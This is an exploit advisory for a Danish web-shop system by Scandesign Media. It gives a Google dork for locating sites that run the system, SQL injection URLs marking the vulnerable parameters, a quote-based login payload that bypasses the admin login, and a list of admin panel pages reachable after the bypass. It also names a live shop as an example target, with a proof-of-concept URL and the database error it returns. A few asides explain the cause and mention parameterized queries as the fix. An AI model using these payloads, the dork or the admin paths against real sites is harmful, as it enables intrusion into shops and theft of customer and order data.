#################################################################################################
# Exploit Title : Scandesign Media AS Denmark SQL Injection and Authentication Bypass Vulnerability
# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army
# Date : 12/09/2018
# Vendor Homepage : scandesignmedia.dk
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
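# CWE : CWE-89 [ Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') ]
# + CWE-592 [ Authentication Bypass Issues ] (CWE-592 is marked deprecated in the CWE list; CWE-287, Improper Authentication, is the current entry for this class)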
#################################################################################################
# Google Dork : intext:''Scandesign Media A/S'' site:dk
# SQL Injection Exploit :
/categori.php?show=long&sort=newest&count=[ID-NUMBER]&categori=[SQL Injection]
/categori.php?show=long&sort=newest&count=[ID-NUMBER]&categori=[ID-NUMBER]&type=normal&tc=[ID-NUMBER]&page=[ID-NUMBER]&tc=[SQL Injection]
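# Admin Login : /admin/login.php (the values below are a quote-based tautology; a login form that accepts them is presumably concatenating the submitted fields into its SQL query, which a parameterized query would prevent)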
Username : '=''or'
Password : '=''or'
# Usable Admin Control Panel URLs =>
/admin/user/edit_user.php
/admin/categori_items/cat.php
/admin/categori_items/reference.php
/admin/categori_items/index_userdefined.php
/admin/categori_items/add_userdefined.php
/admin/campaign/campaign.php
/admin/order/confirmorder.php
/admin/order/faktura.php
/admin/databases/customer.php
/admin/user/edit_priviligies.php
/admin/configuration/config.php
/admin/custompage/custompage.php
/admin/freight_paymethod/freight.php
/admin/freight_paymethod/paymethod.php
#################################################################################################
# Example Site =>
cobioshop.dk/categori.php?show=long&sort=newest&count=20&categori=15%27 => [ Proof of Concept ] => archive.is/GOpwQ
cobioshop.dk/categori.php?show=long&sort=newest&count=20&categori=15&type=normal&tc=1&page=3&tc=1%27
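# SQL Database Error (the echoed query on the last line shows the categori value placed directly inside a quoted string literal, so the appended quote ends the literal early; binding the value as a prepared-statement parameter and keeping database errors out of page output address both problems) =>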
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '0'' at line 1
on line: 10
SELECT item_id FROM webshop_tbl_item WHERE _catid = '15'' AND item_deleted = '0'
#################################################################################################
# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
#################################################################################################